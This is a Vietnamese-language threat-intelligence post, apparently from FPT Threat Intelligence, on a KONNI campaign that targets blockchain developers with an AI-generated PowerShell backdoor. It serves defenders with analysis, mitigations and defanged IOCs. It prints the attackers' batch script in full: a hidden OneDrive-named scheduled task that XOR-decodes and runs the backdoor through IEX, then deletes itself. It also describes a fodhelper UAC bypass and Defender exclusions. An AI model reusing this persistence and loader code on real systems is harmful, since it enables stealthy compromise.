# Cảnh Báo Khẩn: Nhóm KONNI tung chiến dịch tấn công mới nhắm vào nhà phát triển và hạ tầng blockchain

## **Tổng quan**

CPR ghi nhận một chiến dịch phishing mới do KONNI – nhóm APT hoạt động từ ít nhất 2014 – đang thực hiện. Nhóm này vốn nổi tiếng với các hoạt động gián điệp nhắm vào Hàn Quốc, tập trung vào cộng đồng ngoại giao, quan hệ quốc tế, tổ chức phi chính phủ, học thuật và các cơ quan nhà nước.

Trong chiến dịch này, KONNI sử dụng các tài liệu giả dạng tài liệu dự án blockchain để tấn công các nhà phát triển phần mềm và đội kỹ thuật, khả năng nhằm chiếm quyền truy cập vào hạ tầng blockchain, API, ví tiền mã hóa, hoặc môi trường phát triển.

Điểm đáng chú ý là chiến dịch mở rộng rõ rệt ra ngoài Hàn Quốc, và sử dụng mã độc PowerShell được **AI hỗ trợ sinh ra**, cho thấy sự nâng cấp đáng kể trong năng lực của tác nhân đe dọa.

---

## **Mục tiêu và nội dung mồi nhử**

Trước đây, KONNI chủ yếu nhắm vào Hàn Quốc. Tuy nhiên, các mẫu gần đây trên VirusTotal cho thấy nạn nhân nằm ở **Nhật Bản, Úc** và **Ấn Độ**.

Tài liệu mồi nhử mô phỏng tài liệu kỹ thuật dự án blockchain, gồm:

* Kiến trúc hệ thống
    
* Công nghệ sử dụng
    
* Roadmap phát triển
    
* Ngân sách và mốc bàn giao
    

Mục tiêu có vẻ nhằm xâm nhập môi trường phát triển, từ đó:

* Đánh cắp thông tin hạ tầng
    
* Thu thập API keys
    
* Truy cập ví tiền mã hóa
    
* Can thiệp vào chuỗi cung ứng phần mềm
    

Lịch sử ghi nhận KONNI từng có hoạt động liên quan mục tiêu tài chính và tiền mã hóa.

---

## **Chuỗi lây nhiễm**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1769930650150/f1ecfd36-51fb-416a-92b5-13ec522156f4.png align="center")

Chuỗi tấn công khởi đầu từ một đường dẫn Discord dẫn đến file ZIP chứa:

* 1 PDF tài liệu mồi nhử
    
* 1 file LNK độc hại
    

File LNK chứa PowerShell loader và hai payload được nhúng XOR-encoded:

* 1 DOCX mồi nhử (dùng để đánh lạc hướng người dùng)
    
* 1 file CAB chứa các thành phần độc hại
    

Các bước chính:

1. LNK giải mã và ghi DOCX + CAB ra ổ đĩa.
    
2. DOCX được mở để che giấu hành vi độc hại.
    
3. CAB được giải nén, chứa:
    
    * PowerShell backdoor
        
    * 2 batch scripts
        
    * 1 file thực thi UAC bypass
        

Batch đầu tiên:

```powershell
@echo off

    mkdir "C:\ProgramData\VljE"
    move "C:\ProgramData\zVJs.ps1" C:\ProgramData\VljE\
    move "C:\ProgramData\mKIftBn.bat" C:\ProgramData\VljE\
    schtasks /create /sc hourly /mo 1 /tn "OneDrive Startup Task-S-1-5-21-3315426051-1901789636-3309192473-4545" /tr "cmd /c powershell -w h $d=[IO.File]::ReadAllBytes(\\\"C:\ProgramData\VljE\zVJs.ps1\\\");$b=[Text.Encoding]::UTF8.GetBytes(\\\"Q\\\");for($i=0;$i -lt $d.Length;$i++){$d[$i]=$d[$i]-bxor$b[$i%%$b.Length]};$c=[Text.Encoding]::UTF8.GetString($d);iex $c" /rl limited /ru "%username%" /f
    timeout -t 3 /nobreak
    "C:\ProgramData\OneDriveUpdater.exe"
    del "%~f0"&exit /b
```

* Tạo thư mục staging ở `C:\ProgramData\VljE`
    
* Di chuyển backdoor + script vào đó
    
* Tạo scheduled task giả dạng OneDrive, chạy mỗi giờ
    
* Giải mã backdoor (XOR với ‘Q’) rồi chạy bằng IEX
    
* Tự xóa nhằm giảm dấu vết
    

Backdoor PowerShell được mã hóa nặng bằng phép toán số học nhằm che giấu chuỗi và logic thật.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1769930997903/4666435f-5b73-4e87-b986-1cd9d124bd1e.png align="center")

---

## **Backdoor PowerShell do AI tạo ra**

Mẫu phân tích cho thấy rõ dấu hiệu **được viết bằng AI**, bao gồm:

* Có phần documentation rõ ràng, mạch lạc (hiếm gặp trong mã độc)
    
* Chia module theo từng chức năng riêng biệt
    

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1769931246212/85049eba-264b-4da3-8f40-f4f27140e968.png align="center")

* Chứa comment dạng instructional như:
    
    > “# &lt;– your permanent project UUID”
    

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1769931215827/0ba62492-1b35-4ef3-b8b8-d18cfd1e9862.png align="center")

Đây là kiểu thường thấy trong code mẫu do LLM sinh ra.  
Điều này cho thấy KONNI đang tích cực kết hợp AI trong phát triển mã độc.

---

## **Phân tích Backdoor PowerShell**

Backdoor thực hiện:

### **1\. Anti-analysis**

* Kiểm tra môi trường ảo hóa, phần cứng
    
* Blacklist các công cụ phân tích: IDA, Wireshark, Procmon…
    

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1769931289404/c24c6598-d242-4a8c-bee0-3801165d4c64.png align="center")

* Theo dõi hoạt động chuột, yêu cầu có tương tác người dùng
    

### **2\. Kiểm soát chạy một lần**

Tạo mutex toàn hệ thống:  
`Global\SysInfoProject_<UUID>`

UUID sử dụng chung trong toàn chiến dịch.

### **3\. Tạo định danh nạn nhân**

* Lấy serial motherboard + UUID hệ thống
    
* Băm SHA-256 → cắt 16 ký tự đầu
    
* Gắn chuỗi chiến dịch để phân loại nạn nhân
    

### **4\. Hành vi theo quyền người dùng**

* **User:** thực hiện UAC bypass qua *fodhelper.exe*, chạy `rKXujm.exe` để tắt UAC
    
* **Admin:** xóa file bypass, thêm Windows Defender exclusion, nâng quyền scheduled task
    
* **System:** cài đặt công cụ RMM **SimpleHelp**, cho phép truy cập từ xa lâu dài
    

### **5\. Giao tiếp C2**

* Thực hiện cơ chế mô phỏng JavaScript challenge để nhận cookie `__test`
    
* Gửi metadata hệ thống đến C2 định kỳ
    
* Nhận PowerShell code và thực thi thông qua background jobs
    
* Tiếp tục kiểm tra công cụ phân tích trong quá trình chạy
    

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1769931408726/ee3f6847-ef48-4b76-8855-2210dce09cf3.png align="center")

---

## **Biến thể trước đó**

Mẫu cũ từ tháng 10/2025 chứa:

* PowerShell loader nặng obfuscation
    
* Batch files, VBS launcher
    
* 2 file PE: `uc.exe` (UAC bypass) và `OneDriveUpdater.exe`
    
* OneDriveUpdater dùng để download và chạy SimpleHelp client
    

Chuỗi thực thi trong biến thể cũ:

1. `start.vbs` →
    
2. `simi.bat` (staging + chạy OneDriveUpdater) →
    
3. `schedule1.bat` (tạo persistence)
    

Cấu trúc này trùng với nhiều chiến dịch KONNI trong quá khứ.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1769931440382/1b30b888-620a-405e-bbbc-5df3f7dd4854.png align="center")

---

## **Gán Attribution**

Bằng chứng cho thấy đây là chiến dịch của **KONNI**:

* LNK được đóng gói và cấu trúc giống mẫu KONNI trước đây
    
* Chuỗi thực thi VBS → BAT → PowerShell đúng mô hình đặc trưng của KONNI
    
* Reuse nhiều tên file và logic từng xuất hiện trong các chiến dịch cũ
    
* Lure filename trùng với artifact KONNI trước đó (ví dụ *Avinash\_CV.lnk*)
    

Các điểm này khẳng định chiến dịch thuộc bộ công cụ của KONNI.

---

## **Kết luận**

Chiến dịch mới của KONNI cho thấy sự:

* **Giữ nguyên** phương thức lây nhiễm truyền thống (LNK, VBS/BAT chain)
    
* **Thay đổi mạnh** về mục tiêu (nhắm vào blockchain, developer environments)
    
* **Nâng cấp đáng kể** trong công cụ (sử dụng backdoor PowerShell do AI tạo)
    
* **Mở rộng địa lý** sang nhiều quốc gia ngoài Hàn Quốc
    

KONNI tiếp tục tận dụng chuỗi lây nhiễm ổn định, nhưng đang nhanh chóng thích ứng với mục tiêu có giá trị cao và công nghệ mới.

---

## **Khuyến nghị**

Phía **FPT Threat Intelligence** đưa ra các khuyến nghị sau:

### **1\. Chặn kênh phân phối**

* Chặn truy cập tới **Discord CDN** đối với file thực thi, shortcut, ZIP (tùy môi trường).
    
* Block các tên miền/địa chỉ IP IOC trong danh sách kèm theo.
    

### **2\. Tăng cường bảo vệ email & file download**

* Bật **sandbox phân tích file** cho email và web download.
    
* Kiểm soát **tập tin LNK, ZIP, CAB**, không cho người dùng tải hoặc mở nếu không cần thiết.
    

### **3\. Bảo vệ PowerShell và Script**

* Bật **PowerShell Constrained Language Mode** cho người dùng không cần đặc quyền.
    
* Giám sát việc gọi **powershell.exe** từ **LNK / batch / VBS**.
    
* Chặn thực thi **scripts trong C:\\ProgramData** bằng AppLocker hoặc WDAC.
    

### **4\. Giảm nguy cơ leo thang đặc quyền**

* Tắt các kỹ thuật bypass phổ biến như:
    
    * **fodhelper.exe auto-elevated**
        
    * Giới hạn chỉnh sửa registry dưới HKCU\\Software\\Classes.
        
* Bật **UAC ở chế độ Always Notify**.
    

### **5\. Bảo vệ môi trường Dev & Blockchain**

* Tách biệt môi trường developer với mạng sản xuất.
    
* Bảo vệ API keys, credentials, wallet bằng Vault/HSM.
    

---

## **Indicators of Compromise (IOCs)**

### Hashes:

**ZIP**

* c79ef37866b2dff0afb9ca07b4a7c381ba0b201341f969269971398b69ade5d5
    
* c040756802a217abf077b2f14effb1ed68e36165fde660fef8ff0cfa2856f25d
    
* f619d63aa8d09bafb13c812bf60f2b9189a8dc696c7cef2f246c6b223222e94c
    
* b411fbe03d429556ced09412dd26dc972ee55cff907bfdb5594fe9e3f1c9f0b2
    
* fcc9b2ac73a0ca01fb999e6aa1a8bdbd89e632939443bcc9186ae1294089123e
    

**LNK**

* 39fdff2ea1a5e2b6151eccc89ca6d2df33b64e09145768442cec93a578f1760c
    
* 26356e12aae0a2ab1fd0ec15d49208603d3dd1041d50a0b153ab577319797715
    
* a1d4272ec0ce88f9c697b3e6c70624ec5f1ad9a83c9e64120b5ee21688365af9
    
* 856ac810f4a00a7e3fa89aec4c94cc166ae6ccf06c3557e9694f8639223ce25d
    
* e57fa2d1d3e2bff9603ce052e51a8d6ee5c6d207633765b401399b136249ca35
    
* c94e58f134c26c3dc25f69e4da81d75cbf4b4235bcfb40b17754da5fe07aad0a
    
* 3b67217507e0c44bd7a4cfafed0e8958d21594c98eec43a999614815a7060410
    

**CAB**

* de75afa15029283154cf379bc9bb7459cbcd548ff9d11efe24eb2fde7552af07
    
* 8647209127d998774179aa889d2fcc664153d73557e2cca5f29c261c48dd8772
    

**Scripts**

* b958d4d6ce65d1c081800fc14e558c34daff3b28cdd45323d05b8d40c4146c3c
    
* b15f95d0f269bc1edce0e07635681d7dd478c0daa82c6bfd50c551435eba10ff
    
* c2ec24dea46273085daa82e83c1c38f3921c718a61f617a66e8b715d1dcc0f57
    
* fb9f16a8900bae93dd93b5d059a0d2997c1db7198acf731f3acf1696a19eeead
    
* c3c8d6ea686ad87ca2c6fcb5d76da582078779ed77c7544b4095ecd7616ba39d
    
* af8ca986a52e312fb85f97b235e4b406d665d7ac09cbdb5e25662d4c508ebad4
    
* ec8c191ad171cf40461dc870b02f5c4e9904f9fec1191174d524b1fb3cbde47f
    
* 738637fcb82920f418111c0cd83d74d9a0807972a73abfbdc71b7446e5bd6a9d
    
* 159f81fc57399186503190562f28b2dd430d8cc07303e15e2ec60aee6bca798c
    
* eec55e9a7f27f2ecaba71735fbd636679783ff60d9019eabf8216beebd47300b
    
* 20e61936144822399149e651da665eb67b16e90ec824dac3d9eec8a4da42fdd2
    
* 851695cb3807a693aae25c8b9ade20a90eaea6802bc619c1d19d121a92aef7a0
    
* 1ebc4542905c8d4fd8ac6f6d9fadeef51698e5916f6ce1bcc61dcfdea02758ec
    
* 48585baa9f1c2b721bb8c4fbd88eff65f8fa580a662aadcd143bc4fda6590156
    

**Executable**

* f8e86693916be2178b948418228d116a8f73c7856e11c1f4470b8c413268c6c8
    
* 64e6a852fc2e4d3e357222692eefbf445c2bd9ba654b83e64fe9913f2bb115cc
    
* 26a01ffa237241e31a59f1ff4d62a063f55c97598732d55855cce18b8b27b2d6
    

### Domains & IPs:

* filetrasfer.wuaze\[.\]com
    
* goldenftp.rf\[.\]gd
    
* plaza.xo\[.\]je
    
* gabber.42web\[.\]io
    
* humimianserver.kesug\[.\]com
    
* drone.ct\[.\]ws
    
* 46.4.112\[.\]56
    
* 192.144.34\[.\]77
    
* 192.144.34\[.\]40
    
* 34.203.111\[.\]164
    
* 223.16.184\[.\]105
    

---

## **Tham khảo**

* [KONNI Adopts AI to Generate PowerShell Backdoors - Check Point Research](https://research.checkpoint.com/2026/konni-targets-developers-with-ai-malware/)
    
* [Konni Hackers Deploy AI-Generated PowerShell Backdoor Against Blockchain Developers](https://thehackernews.com/2026/01/konni-hackers-deploy-ai-generated.html)
    
* [Konni hackers target blockchain engineers with AI malware](https://www.msn.com/en-us/money/news/konni-hackers-target-blockchain-engineers-with-ai-malware/ar-AA1UVein?ocid=BingNewsVerp)
